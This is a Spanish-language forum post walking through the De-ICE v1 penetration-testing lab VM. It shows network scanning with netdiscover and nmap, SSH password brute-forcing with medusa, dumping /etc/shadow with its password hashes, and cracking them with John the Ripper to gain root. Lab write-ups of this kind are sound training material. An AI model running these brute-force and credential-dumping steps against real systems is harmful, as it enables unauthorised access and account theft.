[Relato] Entorno controlado de seguridad DE-Ice v1

Iniciado por cibergolen, 2 Febrero 2012, 23:21 PM

0 Miembros y 1 Visitante están viendo este tema.

cibergolen

Esta vez vengo con DE-Ice v1.0.

Las distribuciónes de seguridad pueden ser descargadas desde Heorot.net.

¿Qué necesitaremos?


-Dos máquinas virtuales
-De-ICE v1
-Backtrack 5
-Diccionario de claves comunes inglesas

¿Cuáles serán nuestros objetivos?
-Mapeo de red
-Análisis de red
-Fuerza bruta a servicio
-Fuerza bruta a shadow
-Root

¿Reglas?
-No Exploit

Allá que vamos

Escaneamos las redes para localizar a nuestra presa.

Citarnetdiscover

Currently scanning: 192.168.1.0/16   |   Screen View: ARP Reply                                                                                                       
                                                                                                                                                                       
1 Captured ARP Reply packets, from 1 hosts.   Total size: 60                                                                                                         
_____________________________________________________________________________                                                                                         
   IP            At MAC Address      Count  Len   MAC Vendor                                                                                                           
-----------------------------------------------------------------------------
192.168.1.100   08:00:27:b1:50:12    01    060   CADMUS COMPUTER SYSTEMS

Identificamos servicvios con NMAP:

Citarroot@bt:/# nmap -sV 192.168.1.100

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-02 22:07 CET
Nmap scan report for 192.168.1.100
Host is up (0.0070s latency).
Not shown: 992 filtered ports
PORT    STATE  SERVICE  VERSION
20/tcp  closed ftp-data
21/tcp  open   ftp      vsftpd (broken: could not bind listening IPv4 socket)
22/tcp  open   ssh      OpenSSH 4.3 (protocol 1.99)
25/tcp  open   smtp     Sendmail 8.13.7/8.13.7
80/tcp  open   http     Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open   pop3     Openwall popa3d
143/tcp open   imap     UW imapd 2004.357
443/tcp closed https
MAC Address: 08:00:27:B1:50:12 (Cadmus Computer Systems)
Service Info: Host: slax.example.net; OS: Unix

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.29 seconds

Dejando huella

Vemos que tenemnos varios servicios, excepto uno: FTP. No nos permite conexiones IPv4.
Entramos via HTTP, y nos fijamos que la página nos muestra unos correos. Alteremoslos.

Esto fue lo que obtuve:
Citar
addams
aadams
adaams
damsaa
adamsa
banterb
bbanter
banterb
anterbb
bbanteerbb
coffeec
cooffec
ccoffee
coooffe
cooofef
coofefc
cooffee

Lanzamos medusa tratando de tener suerte.
Citar
medusa -h 192.168.1.100 -U user -P user -M ssh

¡Bingo! Nos encuentra un usuario. Mismo usuario y clave.

CitarACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: adaams (3 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: damsaa (4 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: adamsa (5 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: banterb (6 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: bbanter (7 of 17 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.100 User: bbanter Password: bbanter [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: addams (1 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: aadams (2 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: adaams (3 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: damsaa (4 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: adamsa (5 of 17 complete)

Decepción

Accedo vía SSH:
Citarroot@bt:/pentest/passwords/john# ssh bbanter@192.168.1.100
bbanter@192.168.1.100's password:

Pero si tratamos de hacer un cat /etc/shadow, como es lógico, nos dirá que nuestro siguiente comando es:

Citarexit


Si antes leemos el /etc/passwd, veremos que el usuario aadams se las trae con otros permisos.

Pidiendo auxilio a la medusa

Intentemos con otro diccionario:

Citar
medusa -h 192.168.1.100 -U user -P list.lst -M ssh

CitarACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: fuckyou (578 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: matthew (579 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: miller (560 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: ou82 (561 of 675 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.100 User: aadams Password: nostradamus [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: tiger (562 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: trustno1 (563 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: 12345678 (564 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: alex (565 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: windows (566 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: flipper (567 of 675 complete)

Nos muestra el usuario aadams, con su consiguiente clave.

Entramos via SSH, y obtenemos el fichero.

Root Success

Citar
root@bt:/pentest/passwords/john# ssh aadams@192.168.1.100
aadams@192.168.1.100's password:
Linux 2.6.16.
aadams@slax:~$ sudo cat /etc/shadow
Password:
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::

aadams@slax:~$

Salimos.
Citar
exit

Crackeamos.
Citar
root@bt:/pentest/passwords/john# ./john --rules --wordlist=list.lst shadow

El resultado se lo dejo a su imaginación, para no estropear el reto, regalando la clave.

Resultado final:
Citar
root@bt:/pentest/passwords/john# ssh aadams@192.168.1.100
aadams@192.168.1.100's password:
Linux 2.6.16.
aadams@slax:~$ su
Password: *****
root@slax:/home/aadams# whoami
root

root@slax:/home/aadams#

Hasta la próxima.

Dedicación: Oversec, CPH, H-Sec, EH

Saludos